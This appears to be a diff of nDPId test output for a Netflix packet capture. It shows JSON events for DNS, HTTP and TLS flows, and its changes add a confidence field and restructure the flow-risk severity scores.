-00738{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049645,"flow_last_seen":1484319049645,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319049645,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1484319049645,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1484319049645,"pkt":"gCqoTGHM5JjWH70UCABFAABCunsAAEARPNfAqAEHwKgBAcx7ADUALmwlX+cBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAE="}
-00738{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049645,"flow_last_seen":1484319049645,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319049645,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049645,"flow_last_seen":1484319049645,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319049645,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1484319049665,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"ts_msec":1484319049665,"pkt":"5JjWH70UgCqoTGHMCABFAABi4UdAAEAR1erAqAEBwKgBBwA1yhAATkFkBBqBgAABAAIAAAAABGE4MDMEZHNjZwZha2FtYWkDbmV0AAABAAHADAABAAEAAAAMAAS4GcwYwAwAAQABAAAADAAEuBnMKA=="}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1484319049665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.24"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1484319049665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.24"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049672,"flow_last_seen":1484319049672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319049672,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1484319049672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319049672,"pkt":"gCqoTGHM5JjWH70UCABFAABAS8NAAEAGqRPAqAEHuBnMGM+hAFBgKjK0AAAAALAC\/\/92\/gAAAgQFtAEDAwUBAQgKH2T36AAAAAAEAgAA"}
 00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1484319049681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"ts_msec":1484319049681,"pkt":"5JjWH70UgCqoTGHMCABFAAFl4UhAAEAR1ObAqAEBwKgBBwA1zHsBUaLnX+eBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAHADAAFAAEAAABiAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAFYABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AHAABAAAAFwAQJiABCHAPAAAAAAAANChyo8BNABwAAQAAABcAECYgAQhwDwAAAAAAADQoMS\/ATQAcAAEAAAAXABAmIAEIcA8AAAAAAAA0KQT4wE0AHAABAAAAFwAQJiABCHAPAAAAAAAANCk7ncBNABwAAQAAABcAECYgAQhwDwAAAAAAADQnRIjATQAcAAEAAAAXABAmIAEIcA8AAAAAAAA0KBwAwE0AHAABAAAAFwAQJiABCHAPAAAAAAAANCh7ccBNABwAAQAAABcAECYgAQhwDwAAAAAAADQoNhw="}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1484319049681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.32.1.8"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1484319049681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.32.1.8"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049684,"flow_last_seen":1484319049684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319049684,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1484319049684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319049684,"pkt":"gCqoTGHM5JjWH70UCABFAABAHF1AAEAGFLrAqAEHNr8RM8+qAbupwyRaAAAAALAC\/\/92fwAAAgQFtAEDAwUBAQgKH2T39AAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1484319049697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319049697,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lq4GcwYwKgBBwBQz6GV0BcIYCoytaAScSDlwwAAAgQFtAQCCAr\/\/IQ4H2T36AEDAwU="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1484319049700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319049700,"pkt":"gCqoTGHM5JjWH70UCABFAAA0bmdAAEAGhnvAqAEHuBnMGM+hAFBgKjK1ldAXCYAQEBV1gAAAAQEICh9k+AH\/\/IQ4"}
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049672,"flow_last_seen":1484319049703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1484319049703,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}}
+00817{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049672,"flow_last_seen":1484319049703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1484319049703,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1484319049740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319049740,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z6pwpjzKqcMkW6ASOJCp2gAAAgQFtAQCCAqtikoKH2T39AEDAwg="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":910,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1484319049743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319049743,"pkt":"gCqoTGHM5JjWH70UCABFAAA0ddRAAEAGu07AqAEHNr8RM8+qAbupwyRbcKY8y4AQEBUA7QAAAQEICh9k+CqtikoK"}
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049684,"flow_last_seen":1484319049748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319049748,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00861{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049672,"flow_last_seen":1484319049753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1484319049753,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"25":"HTTP suspicious content"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":200,"content_type":"text\/plain","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}}
-00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":920,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049684,"flow_last_seen":1484319049807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319049807,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01245{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":923,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319049684,"flow_last_seen":1484319049850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319049850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049684,"flow_last_seen":1484319049748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319049748,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049672,"flow_last_seen":1484319049753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1484319049753,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":200,"content_type":"text\/plain","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}}
+01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":920,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049684,"flow_last_seen":1484319049807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319049807,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":923,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319049684,"flow_last_seen":1484319049850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319049850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319050652,"flow_last_seen":1484319050652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319050652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1484319050652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319050652,"pkt":"gCqoTGHM5JjWH70UCABFAABA2xBAAEAGenHAqAEHF\/YLkc+rAFC8XkCtAAAAALAC\/\/9pzAAAAgQFtAEDAwUBAQgKH2T7jgAAAAAEAgAA"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1484319050677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319050677,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmYX9guRwKgBBwBQz6susPTdvF5ArqAS\/\/\/2WQAAAgQFtAEDAwkEAggKRVwbeB9k+44="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1484319050678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319050678,"pkt":"gCqoTGHM5JjWH70UCABFAAA0kSxAAEAGxGHAqAEHF\/YLkc+rAFC8XkCuLrD03oAQEBUU+gAAAQEICh9k+6dFXBt4"}
-01015{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":972,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319050652,"flow_last_seen":1484319050682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319050682,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.145","url":"23.246.11.145\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=5xfYVtna3GdYXL71uNs6DZ-X84Y&random=3930708224","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
